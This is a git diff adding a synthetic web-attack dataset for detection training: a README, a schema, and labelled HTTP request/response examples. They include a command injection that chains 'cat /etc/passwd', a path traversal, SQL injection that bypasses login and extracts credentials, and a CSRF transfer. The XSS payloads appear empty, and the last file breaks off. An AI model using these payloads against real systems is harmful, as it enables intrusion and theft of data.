diff --git a/README.md b/README.md index dbfdca5..862b70e 100644 --- a/README.md +++ b/README.md @@ -1 +1,212 @@ -# synthetic-security-dataset \ No newline at end of file +# Synthetic Security Dataset + +A comprehensive dataset of HTTP request and response examples demonstrating various types of malicious attacks. This dataset is designed for security research, training machine learning models for threat detection, and educational purposes. + +## Overview + +This repository contains synthetic examples of common web application security attacks, organized by attack category. Each example includes: + +- Complete HTTP request details (method, URL, headers, body) +- Corresponding HTTP response +- Attack vector description +- Malicious payload +- Detection indicators + +## Dataset Structure + +``` +dataset/ +├── schema.json # JSON schema defining the data structure +├── sql-injection/ # SQL injection attack examples +├── xss/ # Cross-Site Scripting (XSS) examples +├── csrf/ # Cross-Site Request Forgery examples +├── path-traversal/ # Directory/path traversal examples +├── command-injection/ # OS command injection examples +└── xxe/ # XML External Entity (XXE) examples +``` + +## Attack Categories + +### 1. SQL Injection +SQL injection attacks attempt to manipulate database queries by inserting malicious SQL code into input fields. + +**Examples:** +- Authentication bypass +- UNION-based data extraction +- Blind SQL injection + +### 2. Cross-Site Scripting (XSS) +XSS attacks inject malicious scripts into web pages viewed by other users. + +**Examples:** +- Reflected XSS via URL parameters +- Stored XSS via user-generated content +- DOM-based XSS + +### 3. Cross-Site Request Forgery (CSRF) +CSRF attacks trick users into executing unwanted actions on web applications where they're authenticated. + +**Examples:** +- State-changing requests without CSRF tokens +- Malicious form auto-submission + +### 4. 
Path Traversal +Path traversal attacks access files and directories outside the intended directory structure. + +**Examples:** +- Reading system files using dot-dot-slash sequences +- Accessing sensitive configuration files + +### 5. Command Injection +Command injection attacks execute arbitrary operating system commands on the server. + +**Examples:** +- Command chaining using semicolons +- Piping commands +- Command substitution + +### 6. XML External Entity (XXE) +XXE attacks exploit XML parsers that process external entity references. + +**Examples:** +- Local file disclosure +- Server-side request forgery (SSRF) +- Denial of service + +## Data Format + +Each attack example is stored as a JSON file following this structure: + +```json +{ + "id": "unique-identifier", + "category": "Attack Category", + "description": "Description of the attack scenario", + "severity": "critical|high|medium|low", + "request": { + "method": "HTTP_METHOD", + "url": "/path?params", + "headers": {}, + "body": "request body or null" + }, + "response": { + "status": 200, + "headers": {}, + "body": "response body" + }, + "attack_vector": "Explanation of how the attack works", + "payload": "The actual malicious payload", + "indicators": ["indicator1", "indicator2"] +} +``` + +See `dataset/schema.json` for the complete JSON schema definition. 
+ +## Usage + +### Loading the Dataset + +#### Python +```python +import json +import os +from pathlib import Path + +def load_dataset(dataset_path='dataset'): + examples = [] + for category_dir in Path(dataset_path).iterdir(): + if category_dir.is_dir(): + for example_file in category_dir.glob('*.json'): + try: + with open(example_file, 'r') as f: + examples.append(json.load(f)) + except json.JSONDecodeError as e: + print(f"Error parsing {example_file}: {e}") + return examples + +# Load all examples +dataset = load_dataset() +print(f"Loaded {len(dataset)} attack examples") +``` + +#### JavaScript/Node.js +```javascript +const fs = require('fs'); +const path = require('path'); + +function loadDataset(datasetPath = 'dataset') { + const examples = []; + const categories = fs.readdirSync(datasetPath); + + categories.forEach(category => { + const categoryPath = path.join(datasetPath, category); + if (fs.statSync(categoryPath).isDirectory()) { + const files = fs.readdirSync(categoryPath); + files.forEach(file => { + if (file.endsWith('.json')) { + try { + const data = JSON.parse( + fs.readFileSync(path.join(categoryPath, file), 'utf8') + ); + examples.push(data); + } catch (error) { + console.error(`Error parsing ${file}:`, error.message); + } + } + }); + } + }); + + return examples; +} + +// Load all examples +const dataset = loadDataset(); +console.log(`Loaded ${dataset.length} attack examples`); +``` + +### Filtering by Category + +```python +# Get all SQL injection examples +sql_injections = [ex for ex in dataset if ex['category'] == 'SQL Injection'] + +# Get all critical severity attacks +critical_attacks = [ex for ex in dataset if ex['severity'] == 'critical'] +``` + +## Use Cases + +1. **Security Training**: Educational resource for learning about common web vulnerabilities +2. **Machine Learning**: Training data for developing attack detection models +3. **Testing Security Tools**: Benchmark dataset for evaluating WAF, IDS/IPS systems +4. 
**Security Research**: Reference examples for studying attack patterns +5. **CTF Challenges**: Base material for capture-the-flag security exercises + +## Contributing + +Contributions are welcome! To add new attack examples: + +1. Follow the JSON schema defined in `dataset/schema.json` +2. Place the example in the appropriate category directory +3. Use descriptive IDs and clear descriptions +4. Include realistic HTTP headers and responses +5. Provide clear indicators for detection + +## Important Notes + +⚠️ **Warning**: This dataset contains examples of malicious attacks. Use only for: +- Educational purposes +- Security research +- Controlled testing environments +- Training security systems + +**DO NOT** use these examples to attack real systems. Unauthorized access to computer systems is illegal. + +## License + +This dataset is provided for educational and research purposes. Please use responsibly and ethically. + +## Disclaimer + +The examples in this dataset are synthetic and created for educational purposes. They should only be used in controlled environments with proper authorization. The maintainers are not responsible for any misuse of this information. 
\ No newline at end of file diff --git a/dataset/command-injection/example-1.json b/dataset/command-injection/example-1.json new file mode 100644 index 0000000..27bf765 --- /dev/null +++ b/dataset/command-injection/example-1.json @@ -0,0 +1,29 @@ +{ + "id": "command-injection-001", + "category": "Command Injection", + "description": "OS command injection through ping utility", + "severity": "critical", + "request": { + "method": "POST", + "url": "/network-tools/ping", + "headers": { + "Content-Type": "application/json", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" + }, + "body": "{\"host\": \"8.8.8.8; cat /etc/passwd\"}" + }, + "response": { + "status": 200, + "headers": { + "Content-Type": "text/plain" + }, + "body": "PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.\n64 bytes from 8.8.8.8: icmp_seq=1 ttl=64 time=0.045 ms\n\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin" + }, + "attack_vector": "Command injection using semicolon to chain commands", + "payload": "8.8.8.8; cat /etc/passwd", + "indicators": [ + "Command separators (;, &&, ||)", + "System commands in user input", + "Unexpected command output in response" + ] +} diff --git a/dataset/csrf/example-1.json b/dataset/csrf/example-1.json new file mode 100644 index 0000000..c29f31e --- /dev/null +++ b/dataset/csrf/example-1.json @@ -0,0 +1,31 @@ +{ + "id": "csrf-001", + "category": "Cross-Site Request Forgery (CSRF)", + "description": "CSRF attack to transfer funds without user consent", + "severity": "high", + "request": { + "method": "POST", + "url": "/transfer", + "headers": { + "Content-Type": "application/x-www-form-urlencoded", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", + "Referer": "http://attacker.com/malicious.html", + "Cookie": "session=victim_session_token" + }, + "body": "to_account=attacker_account&amount=1000&currency=USD" + }, + "response": { + "status": 200, + "headers": { + "Content-Type": "application/json" + }, + "body": "{\"status\": 
\"success\", \"message\": \"Transfer completed\", \"transaction_id\": \"txn_987654\"}" + }, + "attack_vector": "CSRF attack initiated from external malicious site", + "payload": "Malicious HTML form auto-submitting to transfer endpoint", + "indicators": [ + "Missing or invalid CSRF token", + "Referer from external domain", + "Unexpected state-changing request" + ] +} diff --git a/dataset/index.json b/dataset/index.json new file mode 100644 index 0000000..10a34fe --- /dev/null +++ b/dataset/index.json @@ -0,0 +1,72 @@ +{ + "dataset_version": "1.0.0", + "created_date": "2025-10-28", + "description": "Synthetic HTTP request/response dataset for malicious attack examples", + "total_examples": 8, + "categories": { + "SQL Injection": { + "count": 2, + "severity_distribution": { + "critical": 2 + }, + "examples": [ + "dataset/sql-injection/example-1.json", + "dataset/sql-injection/example-2.json" + ] + }, + "Cross-Site Scripting (XSS)": { + "count": 2, + "severity_distribution": { + "high": 2 + }, + "examples": [ + "dataset/xss/example-1.json", + "dataset/xss/example-2.json" + ] + }, + "Cross-Site Request Forgery (CSRF)": { + "count": 1, + "severity_distribution": { + "high": 1 + }, + "examples": [ + "dataset/csrf/example-1.json" + ] + }, + "Path Traversal": { + "count": 1, + "severity_distribution": { + "critical": 1 + }, + "examples": [ + "dataset/path-traversal/example-1.json" + ] + }, + "Command Injection": { + "count": 1, + "severity_distribution": { + "critical": 1 + }, + "examples": [ + "dataset/command-injection/example-1.json" + ] + }, + "XML External Entity (XXE)": { + "count": 1, + "severity_distribution": { + "critical": 1 + }, + "examples": [ + "dataset/xxe/example-1.json" + ] + } + }, + "severity_overview": { + "critical": 5, + "high": 3, + "medium": 0, + "low": 0 + }, + "schema_version": "1.0.0", + "schema_location": "dataset/schema.json" +} diff --git a/dataset/path-traversal/example-1.json b/dataset/path-traversal/example-1.json new file mode 100644 index 
0000000..5a07988 --- /dev/null +++ b/dataset/path-traversal/example-1.json @@ -0,0 +1,30 @@ +{ + "id": "path-traversal-001", + "category": "Path Traversal", + "description": "Directory traversal attack to access sensitive files", + "severity": "critical", + "request": { + "method": "GET", + "url": "/download?file=../../../../etc/passwd", + "headers": { + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64)", + "Accept": "*/*" + }, + "body": null + }, + "response": { + "status": 200, + "headers": { + "Content-Type": "text/plain", + "Content-Disposition": "attachment; filename=passwd" + }, + "body": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin" + }, + "attack_vector": "Path traversal using dot-dot-slash sequences", + "payload": "../../../../etc/passwd", + "indicators": [ + "Dot-dot-slash sequences (../)", + "Access to system files", + "Path manipulation in file parameter" + ] +} diff --git a/dataset/schema.json b/dataset/schema.json new file mode 100644 index 0000000..bde1d4e --- /dev/null +++ b/dataset/schema.json @@ -0,0 +1,96 @@ +{ + "$schema": "http://json-schema.org/draft-07/schema#", + "title": "Synthetic Security Dataset Entry", + "description": "Schema for HTTP request/response examples of malicious attacks", + "type": "object", + "required": ["id", "category", "description", "severity", "request", "response", "attack_vector", "payload", "indicators"], + "properties": { + "id": { + "type": "string", + "description": "Unique identifier for the attack example", + "pattern": "^[a-z0-9-]+$" + }, + "category": { + "type": "string", + "description": "Attack category/type", + "enum": [ + "SQL Injection", + "Cross-Site Scripting (XSS)", + "Cross-Site Request Forgery (CSRF)", + "Path Traversal", + "Command Injection", + "XML External Entity (XXE)" + ] + }, + "description": { + "type": "string", + "description": "Detailed description of the attack scenario" + }, + "severity": { + "type": "string", + 
"description": "Severity level of the attack", + "enum": ["low", "medium", "high", "critical"] + }, + "request": { + "type": "object", + "description": "HTTP request details", + "required": ["method", "url", "headers"], + "properties": { + "method": { + "type": "string", + "description": "HTTP method", + "enum": ["GET", "POST", "PUT", "DELETE", "PATCH", "HEAD", "OPTIONS"] + }, + "url": { + "type": "string", + "description": "Request URL including path and query parameters" + }, + "headers": { + "type": "object", + "description": "HTTP request headers" + }, + "body": { + "type": ["string", "null"], + "description": "Request body content" + } + } + }, + "response": { + "type": "object", + "description": "HTTP response details", + "required": ["status", "headers", "body"], + "properties": { + "status": { + "type": "integer", + "description": "HTTP status code", + "minimum": 100, + "maximum": 599 + }, + "headers": { + "type": "object", + "description": "HTTP response headers" + }, + "body": { + "type": ["string", "null"], + "description": "Response body content" + } + } + }, + "attack_vector": { + "type": "string", + "description": "Explanation of how the attack works" + }, + "payload": { + "type": "string", + "description": "The actual malicious payload used in the attack" + }, + "indicators": { + "type": "array", + "description": "List of indicators that can help detect this type of attack", + "items": { + "type": "string" + }, + "minItems": 1 + } + } +} diff --git a/dataset/sql-injection/example-1.json b/dataset/sql-injection/example-1.json new file mode 100644 index 0000000..050634b --- /dev/null +++ b/dataset/sql-injection/example-1.json @@ -0,0 +1,30 @@ +{ + "id": "sql-injection-001", + "category": "SQL Injection", + "description": "Classic SQL injection attack attempting to bypass authentication", + "severity": "critical", + "request": { + "method": "POST", + "url": "/login", + "headers": { + "Content-Type": "application/x-www-form-urlencoded", + "User-Agent": 
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" + }, + "body": "username=admin' OR '1'='1&password=anything" + }, + "response": { + "status": 200, + "headers": { + "Content-Type": "application/json", + "Set-Cookie": "session=abc123; HttpOnly; Secure" + }, + "body": "{\"status\": \"success\", \"message\": \"Login successful\", \"user_id\": 1}" + }, + "attack_vector": "Authentication bypass using SQL injection in username field", + "payload": "admin' OR '1'='1", + "indicators": [ + "SQL syntax in input fields", + "Quote characters in username", + "Logical operators (OR) in input" + ] +} diff --git a/dataset/sql-injection/example-2.json b/dataset/sql-injection/example-2.json new file mode 100644 index 0000000..5d847ec --- /dev/null +++ b/dataset/sql-injection/example-2.json @@ -0,0 +1,29 @@ +{ + "id": "sql-injection-002", + "category": "SQL Injection", + "description": "SQL injection using UNION-based attack to extract data", + "severity": "critical", + "request": { + "method": "GET", + "url": "/product?id=1' UNION SELECT username,password FROM users--", + "headers": { + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36", + "Accept": "text/html,application/xhtml+xml" + }, + "body": null + }, + "response": { + "status": 200, + "headers": { + "Content-Type": "text/html; charset=utf-8" + }, + "body": "
admin:$2y$10$hashedpassword
" + }, + "attack_vector": "Data exfiltration using UNION-based SQL injection", + "payload": "1' UNION SELECT username,password FROM users--", + "indicators": [ + "UNION keyword in URL parameter", + "SQL comment markers (--)", + "Quote characters in parameter value" + ] +} diff --git a/dataset/xss/example-1.json b/dataset/xss/example-1.json new file mode 100644 index 0000000..7d4ea05 --- /dev/null +++ b/dataset/xss/example-1.json @@ -0,0 +1,29 @@ +{ + "id": "xss-001", + "category": "Cross-Site Scripting (XSS)", + "description": "Reflected XSS attack through URL parameter", + "severity": "high", + "request": { + "method": "GET", + "url": "/search?q=", + "headers": { + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", + "Accept": "text/html" + }, + "body": null + }, + "response": { + "status": 200, + "headers": { + "Content-Type": "text/html; charset=utf-8" + }, + "body": "No results found
" + }, + "attack_vector": "Reflected XSS via search parameter", + "payload": "", + "indicators": [ + "Script tags in URL parameters", + "JavaScript code in input", + "Unescaped user input reflected in HTML" + ] +} diff --git a/dataset/xss/example-2.json b/dataset/xss/example-2.json new file mode 100644 index 0000000..7266858 --- /dev/null +++ b/dataset/xss/example-2.json @@ -0,0 +1,29 @@ +{ + "id": "xss-002", + "category": "Cross-Site Scripting (XSS)", + "description": "Stored XSS attack via comment submission", + "severity": "high", + "request": { + "method": "POST", + "url": "/comments", + "headers": { + "Content-Type": "application/json", + "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)" + }, + "body": "{\"comment\": \"